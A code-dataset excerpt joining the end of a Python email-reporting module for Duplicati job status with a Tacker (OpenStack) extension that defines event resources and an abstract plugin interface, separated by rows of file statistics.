globs.log.write(2, 'sendEmail(msgHtml={}, msgText={}, subject={}, sender={}, receiver={})'.format(msgHtml, msgText, subject, globs.maskData(sender), globs.maskData(receiver)))
self.connect()
# Build email message
msg = MIMEMultipart('alternative')
if subject is None:
subject = globs.report.reportOpts['reporttitle']
msg['Subject'] = subject
if sender is None:
sender = globs.opts['outsender']
msg['From'] = sender
if receiver is None:
receiver = globs.opts['outreceiver']
msg['To'] = receiver
# Add 'Date' header for RFC compliance - See issue #77
msg['Date'] = email.utils.formatdate(time.time(), localtime=True)
# Record the MIME types of both parts - text/plain and text/html.
# Attach parts into message container.
# According to RFC 2046, the last part of a multipart message is best and preferred.
# So attach text first, then HTML
if msgText is not None:
msgPart = MIMEText(msgText, 'plain')
msg.attach(msgPart)
if msgHtml is not None:
msgPart = MIMEText(msgHtml, 'html')
msg.attach(msgPart)
# See which files need to be emailed
# ofileList consists of tuples of (<filespec>,<emailSpec>)
# Filespec is "<filename,type>". <emailSpec> is True (attach file as email) or False (dont).
if globs.ofileList:
for ofile in globs.ofileList:
if ofile[1]: # True - need to email
fname = ofile[0].split(',')[0]
attachment = open(fname, 'rb')
file_name = os.path.basename(fname)
part = MIMEBase('application','octet-stream')
part.set_payload(attachment.read())
part.add_header('Content-Disposition',
'attachment',
filename=file_name)
encoders.encode_base64(part)
msg.attach(part)
# Send the message via SMTP server.
# The encode('utf-8') was added to deal with non-english character sets in emails. See Issue #26 for details
globs.log.write(2,'Sending email to [{}]'.format(globs.maskData(receiver.split(','))))
self.server.sendmail(sender, receiver.split(','), msg.as_string().encode('utf-8'))
return None
# Send email for errors
def sendErrorEmail(self, errText):
globs.log.write(2, 'sendErrorEmail()')
self.connect()
# Build email message
msg = MIMEMultipart('alternative')
msg['Subject'] = 'Duplicati Job Status Error'
msg['From'] = globs.opts['outsender']
msg['To'] = globs.opts['outreceiver']
msg['Date'] = email.utils.formatdate(time.time(), localtime=True) # Add 'Date' header for RFC compliance - See issue #77
# Record the MIME type. Only need text type
msgPart = MIMEText(errText, 'plain')
msg.attach(msgPart)
# Send the message via local SMTP server.
# The encode('utf-8') was added to deal with non-english character sets in emails. See Issue #26 for details
globs.log.write(2,'Sending error email to [{}]'.format(globs.maskData(globs.opts['outreceiver'].split(','))))
self.server.sendmail(globs.opts['outsender'], globs.opts['outreceiver'].split(','), msg.as_string().encode('utf-8'))
return None
| 58.345808 | 245 | 0.556459 | 4,126 | 38,975 | 5.250606 | 0.189045 | 0.024003 | 0.037805 | 0.018095 | 0.236614 | 0.17753 | 0.148772 | 0.108198 | 0.084749 | 0.069886 | 0 | 0.015334 | 0.324003 | 38,975 | 667 | 246 | 58.433283 | 0.806885 | 0.23569 | 0 | 0.272138 | 0 | 0.008639 | 0.193717 | 0.017414 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030238 | false | 0.015119 | 0.038877 | 0.00216 | 0.153348 | 0.00216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b838e0d54c247d6c2708be9b4641d2684a62fb | 4,557 | py | Python | tacker/extensions/common_services.py | hyunchic86/NDN-test | 2417ececbd9a1b9bb4438baf5404cee872e4ec78 | [
"Apache-2.0"
] | null | null | null | tacker/extensions/common_services.py | hyunchic86/NDN-test | 2417ececbd9a1b9bb4438baf5404cee872e4ec78 | [
"Apache-2.0"
] | null | null | null | tacker/extensions/common_services.py | hyunchic86/NDN-test | 2417ececbd9a1b9bb4438baf5404cee872e4ec78 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 Brocade Communications Systems Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from tacker.api import extensions
from tacker.api.v1 import attributes as attr
from tacker.api.v1 import resource_helper
from tacker.common import exceptions
from tacker.plugins.common import constants
from tacker.services import service_base
class EventCreationFailureException(exceptions.TackerException):
message = _("Failed to create an event: %(error_str)s")
class EventNotFoundException(exceptions.TackerException):
message = _("Specified Event id %(evt_id)s is invalid. Please verify and "
"pass a valid Event id")
class InvalidModelException(exceptions.TackerException):
message = _("Specified model is invalid, only Event model supported")
class InputValuesMissing(exceptions.InvalidInput):
message = _("Parameter input values missing for the key '%(key)s'")
class ParamYAMLInputMissing(exceptions.InvalidInput):
message = _("Parameter YAML input missing")
class InvalidFormat(exceptions.InvalidInput):
message = _("Invalid format. '%(error)s'")
RESOURCE_ATTRIBUTE_MAP = {
'events': {
'id': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'resource_id': {
'allow_post': False,
'allow_put': False,
'is_visible': True
},
'resource_type': {
'allow_post': False,
'allow_put': False,
'is_visible': True
},
'resource_state': {
'allow_post': False,
'allow_put': False,
'is_visible': True
},
'timestamp': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'event_details': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'event_type': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
}
}
class Common_services(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return 'COMMONSERVICES'
@classmethod
def get_alias(cls):
return 'Commonservices'
@classmethod
def get_description(cls):
return "Extension for CommonServices"
@classmethod
def get_namespace(cls):
return 'https://wiki.openstack.org/Tacker'
@classmethod
def get_updated(cls):
return "2016-06-06T13:00:00-00:00"
@classmethod
def get_resources(cls):
special_mappings = {}
plural_mappings = resource_helper.build_plural_mappings(
special_mappings, RESOURCE_ATTRIBUTE_MAP)
attr.PLURALS.update(plural_mappings)
return resource_helper.build_resource_info(
plural_mappings, RESOURCE_ATTRIBUTE_MAP, constants.COMMONSERVICES,
translate_name=True)
@classmethod
def get_plugin_interface(cls):
return CommonServicesPluginBase
def update_attributes_map(self, attributes):
super(Common_services, self).update_attributes_map(
attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)
def get_extended_resources(self, version):
version_map = {'1.0': RESOURCE_ATTRIBUTE_MAP}
return version_map.get(version, {})
@six.add_metaclass(abc.ABCMeta)
class CommonServicesPluginBase(service_base.NFVPluginBase):
def get_plugin_name(self):
return constants.COMMONSERVICES
def get_plugin_type(self):
return constants.COMMONSERVICES
def get_plugin_description(self):
return 'Tacker CommonServices plugin'
@abc.abstractmethod
def get_event(self, context, event_id, fields=None):
pass
@abc.abstractmethod
def get_events(self, context, filters=None, fields=None, sorts=None,
limit=None, marker_obj=None, page_reverse=False):
pass
| 28.841772 | 78 | 0.65745 | 501 | 4,557 | 5.798403 | 0.369261 | 0.02685 | 0.033735 | 0.045783 | 0.185198 | 0.17074 | 0.143201 | 0.11222 | 0.11222 | 0.098451 | 0 | 0.008816 | 0.253237 | 4,557 | 157 | 79 | 29.025478 | 0.844843 | 0.136054 | 0 | 0.311927 | 0 | 0 | 0.18052 | 0.006374 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12844 | false | 0.027523 | 0.073395 | 0.082569 | 0.431193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |